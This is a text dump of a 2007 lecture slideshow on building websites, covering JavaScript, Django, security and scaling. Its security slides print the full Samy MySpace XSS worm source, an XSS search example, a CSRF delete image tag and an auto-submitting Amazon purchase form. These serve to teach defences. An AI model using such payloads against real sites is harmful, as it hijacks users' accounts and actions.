Successfully reported this slideshow.
Your SlideShare is downloading. ×

How to build the Web

Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad

Check these out next

1 of 115 Ad

How to build the Web

Download to read offline

A guest lecture I gave for the "Internet Technology" course at my old University (Bath). I tried to pull together all of the things I wish I'd been told before I started building things on the Web.

A guest lecture I gave for the "Internet Technology" course at my old University (Bath). I tried to pull together all of the things I wish I'd been told before I started building things on the Web.

Advertisement
Advertisement

More Related Content

Similar to How to build the Web (20)

More from Simon Willison (20)

Advertisement

Recently uploaded (20)

How to build the Web

  1. 1. How to build the Web Simon Willison 30th November 2007
  2. 2. This talk • Modern client-side engineering • Server-side engineering and web frameworks • Web application security • Building sites that scale
  3. 3. What to build How to build it Product design Browsers! Information architecture Client-side engineering User experience Social software design Servers! Usability Server-side engineering Marketing ...
  4. 4. Client-side engineering
  5. 5. The great myth of client-side development “It’s way easier than server-side development - after all, it’s just HTML”
  6. 6. That’s hogwash
  7. 7. “Yahoo! Juku is a comprehensive, 3-6 month program to train professional front end developers. The curriculum includes advanced topics in JavaScript, DOM, HTML, CSS,YUI, performance, and accessibility. Why train raw recruits to this degree? Well, in the San Francisco Bay Area, including the Silicon Valley, it’s hard-as-heck to find good front end programmers and web designers.” http://developer.yahoo.net/blog/archives/2007/11/the_harvard_of.html
  8. 8. Quines char*f=quot;char*f=%c%s%c;main() {printf(f,34,f,34,10);}%cquot;; main(){printf(f,34,f,34,10);}
  9. 9. (*O/*_/ http://ideology.com.au/polyglot/ Cu #%* )pop mark/CuG 4 def/# 2 def%%%%@@P[TX---PP_SXPY!Ex(mx2ex(quot;SX!Ex4P)Ex= CuG #%* *+Ex= CuG #%*------------------------------------------------------------------*+Ex= Polyglots CuG #%* POLYGLOT - a program in eight languages 15 February 1991 *+Ex= CuG #%* 10th Anniversary Edition 1 December 2001 *+Ex= CuG #%* Written by Kevin Bungard, Peter Lisle, and Chris Tham *+Ex= CuG #%*------------------------------------------------------------------*QuZ= CuG #%* *+Ex= CuG #%*!Mx)ExQX5ZZ5SSP5n*5X!)Ex+ExPQXH,B+ExP[-9A-9B(g?(gA'UTTER_XYZZXX!X *+ CuG #(* *( C # */); /*( C # *) program polyglot (output); (*+ C # identification division. C C # program-id. polyglot. C # C # data division. Perl C # procedure division. C # Pascal C # * ))cleartomark /Bookman-Demi findfont 36 scalefont setfont ( C #* ( C # Fortran C #* hello polyglots$ C # main. COBOL C # perform C /# * ) 2>_$$; echo quot;hello polyglotsquot;; rm _$$; exit; C #*( PostScript C # C *0 ) unless print quot;hello polyglotsnquot;; __END__ bash/sh/csh print C stop run. -*, 'hello polyglots' x86 assembler C C print. C display quot;hello polyglotsquot;. ( C */ int i; /* C */ main () { /* C */ i=printf (quot;hello polyglotsnquot;); O= &i; return *O; /* C *) (* C *) begin (* C *) writeln ('hello polyglots'); (* C *) (* ) C * ) pop 60 360 ( C * ) pop moveto (hello polyglots) show ( C * ) pop showpage (( C *) end .(* ) C)pop% program polyglot. *){*/}
  10. 10. Rendering engines
  11. 11. Rendering engines Opera desktop Safari Opera mobile iPhone Nintendo Wii Nokia Series 60 Nintendo DS Google Android Firefox Ice weasel Sadly still 85% Camino of the market Galleon
  12. 12. IE is the problem child • Microsoft simply stopped updating it once they had won the browser wars... IE 6 came out in 2001! • Still has shaky support for CSS 2.1 • Many JavaScript APIs developed before standards even existed • Requires a disproportionate amount of development time • Status of IE 8 is uncertain
  13. 13. Recommendations • Develop to the standards using Firefox • The cases where IE deviates from the standards are relatively well understood, and can usually be worked around • Avoid CSS hacks; conditional comments are your friend <!--[if IE]><link rel=quot;stylesheetquot; type=quot;text/ cssquot; href=quot;/static/ieonly.cssquot;><![endif]-->
  14. 14. Accessibility • Assistive technology thrives on semantic HTML • <label> elements for forms • <h1>...<h6> headers for structure • Avoiding tables for layout • Watch a video of a screen reader user; they may well browse faster than you do • Accessibility is much more than just screen readers - colour blindness, motor disorders, learning disabilities, even just poor eyesite
  15. 15. JavaScript “JavaScript was a rushed little hack for Netscape 2 that was then frozen prematurely during the browser wars, and evolved significantly only once by ECMA. So its early flaws were never fixed, and worse, no virtuous cycle of fine-grained community feedback [...] ever occurred.” -Brendan Eich
  16. 16. But despite that... • JavaScript is actually a really neat little language • Functions are first-class objects • Lexical closures • Objects are hash tables • If you take the time to learn it, it will repay you handsomely
  17. 17. Ajax
  18. 18. February 2005
  19. 19. AJAX v.s. Ajax “Asynchronous JavaScript + XML”
  20. 20. AJAX v.s. Ajax “Any technique that “Asynchronous allows the client to JavaScript + XML” retrieve more data from the server without reloading the whole page”
  21. 21. Unobtrusive JavaScript • JavaScript isn't always available • Security conscious organisations (and users) sometimes disable it • Some devices may not support it (mobile phones for example) • Assistive technologies (screen readers) may not play well with it • Search engine crawlers won't execute it • Unobtrusive: stuff still works without it!
  22. 22. Progressive enhancement • Start with solid markup • Use CSS to make it look good • Use JavaScript to enhance the usability of the page • The content remains accessible no matter what
  23. 23. Unobtrusive examples
  24. 24. labels.js • One of the earliest examples of this technique, created by Aaron Boodman (now of Greasemonkey and Google Gears fame)
  25. 25. How it works <label for=quot;searchquot;>Search</label> <input type=quot;textquot; id=quot;searchquot; name=quot;qquot;> • Once the page has loaded, the JavaScript: • Finds any label elements linked to a text field • Moves their text in to the associated text field • Removes them from the DOM • Sets up the event handlers to remove the descriptive text when the field is focused • Clean, simple, reusable
  26. 26. easytoggle.js • An unobtrusive technique for revealing panels when links are clicked <ul> <li><a href=quot;#panel1quot; class=quot;togglequot;>Panel 1</a></li> <li><a href=quot;#panel2quot; class=quot;togglequot;>Panel 2</a></li> <li><a href=quot;#panel3quot; class=quot;togglequot;>Panel 3</a></li> </ul> <div id=quot;panel1quot;>...</div> <div id=quot;panel2quot;>...</div> <div id=quot;panel3quot;>...</div>
  27. 27. How it works • When the page has loaded... • Find all links with class=quot;togglequot; that reference an internal anchor • Collect the elements that are referenced by those anchors • Hide all but the first • Set up event handlers to reveal different panels when a link is clicked • Without JavaScript, links still jump to the right point
  28. 28. Django filter lists • Large multi-select boxes aren't much fun • Painful to scroll through • Easy to lose track of what you have selected • Django's admin interface uses unobtrusive JavaScript to improve the usability here
  29. 29. • Ajax is often used to avoid page refreshes • So... • Write an app that uses full page refreshes • Use unobtrusive JS to quot;hijackquot; links and form buttons and use Ajax instead • Jeremy Keith coined the term quot;Hijaxquot; to describe this
  30. 30. JavaScript libraries “The bad news: JavaScript is broken. The good news: It can be fixed with more JavaScript!” - Geek folk saying
  31. 31. Main contenders • Prototype • The Yahoo! User Interface Library • The Dojo Toolkit • jQuery • It’s worth evaluating these in detail, but if you only have time to learn one...
  32. 32. The short answer: use jQuery
  33. 33. Client-side performance • Relatively new field, pioneered by the performance team at Yahoo! • A few simple changes can make a huge difference to perceived loading times • Example tip: serve your static files (CSS, images etc) from a separate domain - that way the cookies from your regular domain won’t slow down the requests
  34. 34. Server-side engineering
  35. 35. URL design (Yes, I should probably be calling them URIs)
  36. 36. Bad URLs example.com/index.html example.com/article.php?sectionId=2343&contentId=638 example.com/blog/2007/December.aspx www.amazon.com/dp/0596516177? tag=davidflanagancom&camp=14573&creative=327641&linkCode=as1& creativeASIN=0596516177&adid=165MWWERY4H71AJERGNZ& • Unnecessary filenames • Expose implementation details • Overly complex
  37. 37. Characteristics of good URLs • “Cool URIs don’t change” • Guessable • Hackable • Readable over the phone • Reflects the hierarchy of the site and its data
  38. 38. A good URL • simonwillison.net/2007/Nov/27/thumbnail/ • Short, hackable, no implementation exposed • No matter what you’re building, including the year can be really useful in allowing you to change your opinion on your URLs later on without breaking old links
  39. 39. The Open Source stack • The only option I would consider • Open source means: • Zero vendor lock-in; many open-source components are interchangeable • Better support (fix it yourself, or pay someone smart to fix it for you) • Less bugs and better quality code
  40. 40. Dynamic languages http://xkcd.com/303/
  41. 41. Dynamic languages • Social applications in particular are almost impossible to get right first time • Development only really starts after you’ve launched something and seen what people use it for • Speed and flexibility of development are critical • Dynamic languages let you get more done with less lines of code (which means less bugs)
  42. 42. LAMP • Linux • Apache • MySQL • PHP/Perl/Python
  43. 43. LAMP, evolved • Linux / FreeBSD / Solaris • Apache / Lighttpd / nginx / ... • MySQL / PostgreSQL • PHP/Perl/Python / Ruby
  44. 44. Web frameworks • Ruby: Ruby on Rails • Python: Django, Pylons, TurboGears • PHP: Symfony, CakePHP, Zend Framework • Perl: Catalyst, Maypole
  45. 45. Web frameworks • Ruby: Ruby on Rails • Python: Django, Pylons, TurboGears • PHP: Symfony, CakePHP, Zend Framework • Perl: Catalyst, Maypole
  46. 46. Django
  47. 47. Lawrence, Kansas - 2003
  48. 48. • Two developers • Two designers • Around a dozen editorial staff
  49. 49. How do you build a site like lawrence.com? • Interns - unpaid labour! • A big relational database • Newspaper people are baffled by these... • ... so you need a good interface for it • And as many development shortcuts as possible
  50. 50. Characteristics • Clean URLs • Loosely coupled components • Designer-friendly templates • Less code • The “good bits” from PHP
  51. 51. The Django stack • HTTP handling • Models (an ORM) • Views • Templates • Extras • Admin, RSS framework, generic views...
  52. 52. The Django workflow • Build the models • Instant admin! Content people can start adding data • Writing the views • Throw the templates to the designers
  53. 53. Open source Django • Django has been open-source since mid-2005 • The newspaper has been able to hire excellent developers from the community • The newspaper CMS is sold as Ellington; one of the features is that you can hire your own Django developers to modify it • Django has been hugely improved by contributions from outside the newspaper
  54. 54. www.djangosites.org
  55. 55. www.djangoproject.com
  56. 56. Don’t Repeat Yourself
  57. 57. All frameworks provide: • A recommended way of laying out code • Separation of application and presentation logic using a template system • An ORM, to reduce the amount of code needed to talk to a database • Reusable components for common tasks
  58. 58. Security
  59. 59. Three key attacks • SQL injection • XSS (cross-site scripting) • CSRF (cross-site request forgery)
  60. 60. SQL injection
  61. 61. • SQL injection is inexcusable • If the environment you are using doesn’t protect against this for you (through parameterised queries), use a different tool
  62. 62. Cross-site scripting • The most common security hole on the web http://example.com/search?q=<script>alert(quot;helloquot;);</script> You searched for <?php echo $_GET['q']; ?> • Massive security hole!
  63. 63. XSS attackers can... • Replace your logo with something obscene • Steal your user’s authentication cookies • Re-target login forms to point to a password stealing script • Perform any action that the user is allowed to perform themselves • Create self-propagating worms
  64. 64. http://namb.la/popular/ http://namb.la/popular/tech.html samy is my hero
  65. 65. <div id=mycode style=quot;BACKGROUND: url('java script:eval(document.all.mycode.expr)')quot; expr=quot;var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split ('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if (location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M) {getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while (Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval ('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form- urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB) +BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn (BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE) {AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'} var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</td>');AG=AG.substring (61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel'] ='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm? fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return} var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS ['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm? fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/ index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend (BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm? fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if (xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL (AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm? fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2) {return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content- Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}quot;></ DIV>
  66. 66. HTML is dangerous • It’s best not to allow un-trusted users to submit HTML at all • If you let them submit HTML, you’ll need an industrial grade HTML parser (which emulates browsers, not just the HTML spec) and a very restrictive whitelist • CSS can include JavaScript, and even regular CSS positioning can be used for phishing
  67. 67. CSRF • Much less widely understood than XSS... • ... but almost certainly more common • Cross-site request forgery attacks allow attackers to force your users to take actions on your site that they didn’t mean to take • <img src=quot;http://example.com/admin/delete.php?id=5quot;> • Not just GET; hidden forms allow POST as well
  68. 68. <iframe style=quot;width: 0px; height: 0px; visibility: hiddenquot; name=quot;hiddenquot;></iframe> <form name=quot;csrfquot; action=quot;http://amazon.com/gp/ product/handle-buy-boxquot; method=quot;postquot; target=quot;hiddenquot;> <input type=quot;hiddenquot; name=quot;ASINquot; value=quot;059600656Xquot; /> <input type=quot;hiddenquot; name=quot;offerListingIDquot; value=quot;XYPvvbir%2FyHMyphE%2Fy0hKK%2BNt%2FB7% 2FlRTFpIRPQG28BSrQ98hAsPyhlIn75S3jksXb3bdE% 2FfgEoOZN0Wyy5qYrwEFzXBuOgqfquot; /> </form> <script>document.forms.csrf.submit();</script> http://shiflett.org/blog/2007/mar/my-amazon-anniversary
  69. 69. Defence against CSRF • You need to know if the form that is being submitted is one that you served up from your own site (as opposed to an evil form created by an attacker) • Include a hidden form field with a token generated by your site and associated with the logged in user in a non-predictable way
  70. 70. Building sites that scale
  71. 71. Scalability is not performance
  72. 72. Scalability is not performance Scalable systems increase their performance as new hardware is added, proportional to the hardware’s capacity
  73. 73. Vertical v.s. horizontal • Vertical scaling: buy a bigger machine • More RAM • More CPU(s) • “Big iron” costing $100,000+ • Horizontal scaling: buy more machines • Almost always better than vertical scaling • But... software must be designed to scale out
  74. 74. “Premature optimisation is the root of all evil” - Tony Hoare and Donald Knuth
  75. 75. http://blog.ilike.com/ilike_team_blog/2007/06/holy_cow_6mm_us.html
  76. 76. “Shared nothing” • Rasmus Lerdorf, the creator of PHP, describes this as a key principle of scaling • Application servers (web servers running PHP) have no shared state - everything stateful is pushed out to the database layer • This lets you trivially horizontally scale your application servers behind a load balancer • Now you just have to scale the data layer...
  77. 77. Four steps to building a scalable data layer • Add caching • De-normalise where necessary • Add database replication • Add sharding
  78. 78. Caching • You could cache to disk or shared memory... • ... but you’re better off using memcached • Distributed key/value in-memory caching system, first developed for LiveJournal • Facebook,YouTube, Wikipedia, Flickr... obj = memcache.get(obj_id) if not obj: obj = construct_obj_from_database(obj_id) memcache.put(obj_id, obj) return obj
  79. 79. “Normalised data is for sissies” Cal Henderson, Flickr • You can get a major speed-up by duplicating some data (e.g. counts) in your database • Your application logic will need to keep everything in sync
  80. 80. Replication • Master-slave replication lets you set up copies of the database to accelerate reads Writes all go to master Master Slave Slave Slave Reads spread across all slaves
  81. 81. Replication • Master-master replication provides redundant masters, but doesn’t really improve write performance (both still have to make the same number of writes) Writes all go to masters Master Master Slave Slave Slave Reads spread across all slaves
  82. 82. Sharding • Sometimes known as federation • Users 1-1000 are on database A, 1000-2000 are on database B... • Often requires a large scale re-write of the system • Much harder to do in social applications where relationships span multiple databases • WordPress MU is an interesting case-study
  83. 83. Scalable business models • Scaling gets a lot easier if you build it in to your business model • 37signals products (Basecamp, Highrise) shard naturally based on individual customer accounts - and more customers means more money for servers • Second Life shards by land area, and land has to be bought by users - they’re essentially a 3D web hosting company
  84. 84. Build it on Amazon • S3 - Simple Storage Service • Cheap, robust key-value storage of both small and large files • EC2 - Elastic Compute Cloud • On-demand instant virtual servers, billed by the hour • SQS - Simple Queue Service
  85. 85. Thank you!
  86. 86. Thank you!

×